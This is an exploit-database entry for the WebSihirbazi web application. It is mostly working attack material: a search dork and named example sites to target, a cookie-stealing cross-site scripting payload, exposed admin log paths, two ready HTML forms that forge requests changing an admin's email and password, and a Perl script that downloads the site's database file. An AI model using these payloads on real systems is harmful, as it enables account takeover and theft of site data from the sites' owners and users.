Lucene search
K

WebSihirbazi <= Multiple Remote Vulnerabilities

🗓️ 13 Oct 2010 00:00:00Reported by KnocKoutType 
zdt
 zdt
🔗 0day.today👁 25 Views

WebSihirbazi Multiple Remote Vulnerabilities disclosed through Cross Site Scripting, Unquestionably LOGS, and CSRF Exploits. Vulnerable software version unspecified. Exploit database available on Inj3ct0r.com. Contact: [email protected

Code
===============================================
WebSihirbazi <= Multiple Remote Vulnerabilities
===============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm KnocKout  member from Inj3ct0r Team           1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Contact : [email protected]
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : WEB Sihirbaz
~Version : unspecified
~Software: http://www.sitehazirla.org/
~Vulnerability Style : Disclosure
~DORK : Powered By WebSihirbaz
~Vuln.Date of birth:) : 11.10.2010
-----------
Demos
http://www.kazem.com.tr
http://www.cevrikcaglar.com
http://www.efecelikboru.com.tr
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
               ------- Explotation ------
               Cross Site Scripting 
              http://VICTIM/admin/Default.asp?GirisMSJ="><script>alert(document.cookie)
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              Unquestionably LOGS 
              http://VICTIM/admin/stats/gelip.asp
              http://VICTIM/admin/stats/saysite.asp
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
              
   ------- CSRF Exploits -------
  E-mail Change CSRF Exploit(HTML);
####################################################################################
   ------- E-mail Change CSRF Exploit(HTML) -------
######################################################################################

<title>E-mail Change CSRF Exploit by KnocKout</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0"><DIV align=center>
<TABLE style="BORDER-COLLAPSE: collapse" borderColor=#ffffff cellPadding=5 width=427 border=1>
<TBODY>
<TR>
<TD width=417>
<FORM name=form action=http://[VICTIM]/admin/EpostaDegistirgonder.asp method=post>
<TABLE height=114 cellSpacing=3 cellPadding=2 width=411 align=center border=0>
<TBODY>

<TR>
<TD borderColor=#ffffff align=right width=162 bgColor=#ffffff height=9><SPAN style="FONT-WEIGHT: 700"><FONT style="FONT-SIZE: 8pt" face=Verdana>Eski Adresiniz</FONT></SPAN><FONT style="FONT-WEIGHT: 700; FONT-SIZE: 8pt" face=Verdana> :</FONT></TD>
<TD width=232 bgColor=#ffffff height=9><FONT face=Verdana><INPUT id=isim1 style="FONT-SIZE: 8pt; COLOR: #000000; FONT-FAMILY: Verdana" size=28 [email protected] name=adres></FONT></TD></TR>
<TR>
<TD borderColor=#ffffff align=right width=162 bgColor=#ffffff height=29><SPAN style="FONT-WEIGHT: 700"><FONT style="FONT-SIZE: 8pt" face=Verdana>Yeni Adresiniz</FONT></SPAN><FONT style="FONT-WEIGHT: 700; FONT-SIZE: 8pt" face=Verdana> :</FONT></TD>
<TD width=232 bgColor=#ffffff height=29><FONT face=Verdana><INPUT id=isim4 style="FONT-SIZE: 8pt; COLOR: #000000; FONT-FAMILY: Verdana" size=28 [email protected] name=email></FONT></TD></TR>
<TR>
<TD align=right width=162 bgColor=#ffffff height=10><FONT style="FONT-WEIGHT: 700; FONT-SIZE: 8pt" face=Verdana>New Password :</FONT></TD>
<TD width=232 bgColor=#ffffff height=10><INPUT id=isim2 style="FONT-SIZE: 8pt; COLOR: #000000; FONT-FAMILY: Verdana" type=password size=28 name=sifre></TD></TR>
<TR>

<TD align=right width=162 bgColor=#ffffff height=23><FONT style="FONT-WEIGHT: 700; FONT-SIZE: 8pt" face=Verdana>Re New Password :</FONT></TD>
<TD width=232 bgColor=#ffffff height=23><INPUT id=isim3 style="FONT-SIZE: 8pt; COLOR: #000000; FONT-FAMILY: Verdana" type=password size=28 name=sifre2></TD></TR>
<TR>
<TD width=162 bgColor=#ffffff height=30><INPUT id=Subject type=hidden value="Exploit Exec!" name=Subject></TD>
<TD width=232 bgColor=#ffffff height=30><INPUT type=submit value=Degisitir name=Submit>&nbps; </TD></TR></TBODY></TABLE></FORM></TD></TR></TBODY></TABLE></DIV></body>
</html>

####################################################################################
   ------- E-mail add CSRF Exploit(HTML) -------
######################################################################################
  <title>E-Mail Add CSRF Exploit by KnocKout</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
</head>

<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0">
<div align="center">
  <table width="427" border="1" cellpadding="5" bordercolor="#FFFFFF" style="border-collapse: collapse">
    <tr>

      <td width="417"><form name="form" method="post" action="http://[VICTIM]/admin/EpostaEklegonder.asp">
          <table width="411" border="0" align="center" cellpadding="2" cellspacing="3" height="114">
            <tr> 
              <td width="162" align="right" height="23" bordercolor="#FFFFFF" bgcolor="#FFFFFF">
              <span style="font-weight: 700">
              <font face="Verdana" style="font-size: 8pt">E.posta Adresiniz</font></span><font face="Verdana" style="font-size: 8pt; font-weight:700"> :</font></td>
              <td width="232" height="23" bgcolor="#FFFFFF"><font face="Verdana">
              <input name="email" type="text" id="isim1" size="28" style="font-family: Verdana; font-size: 8pt; color: #000000" value="@VICTIM"></font></td>

            </tr>
            <tr> 
              <td align="right" width="162" height="10" bgcolor="#FFFFFF">
              <font face="Verdana" style="font-size: 8pt; font-weight:700">
              Юifreniz :</font></td>
              <td width="232" height="10" bgcolor="#FFFFFF">
              <input name="sifre" type="password" id="isim2" size="28" style="font-family: Verdana; font-size: 8pt; color: #000000"></td>
            </tr>
            <tr>

              <td align="right" width="162" height="23" bgcolor="#FFFFFF">
              <font face="Verdana" style="font-size: 8pt; font-weight:700">
              Юifre Tekrarэ :</font></td>
              <td width="232" height="23" bgcolor="#FFFFFF">
              <input name="sifre2" type="password" id="isim3" size="28" style="font-family: Verdana; font-size: 8pt; color: #000000"></td>
            </tr>
            <tr>
              <td width="162" height="30" bgcolor="#FFFFFF"><input name="Subject" type="hidden" id="Subject" value="Exploit Exec!"></td>

              <td width="232" height="30" bgcolor="#FFFFFF">
              <input type="submit" name="Submit" value="Ekle">&nbps; </td>
            </tr>
            </table>
        </form></td>
    </tr>
  </table>
</div>
</body>

</html>

----------------------------------------
WebSihirbazi <= Remote Database Disclosure Exploit

    ~~~~~~~~ Explotation|(pl)~~~~~~~~~~~
    
use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title WEB Sihirbaz - Remote Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* WEB Sihirbaz - Remote Disclosure Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* Contact :   knockoutr[at]msn[dot]com                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="_os_data/OS_data.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}


    ================================



#  0day.today [2018-02-18]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation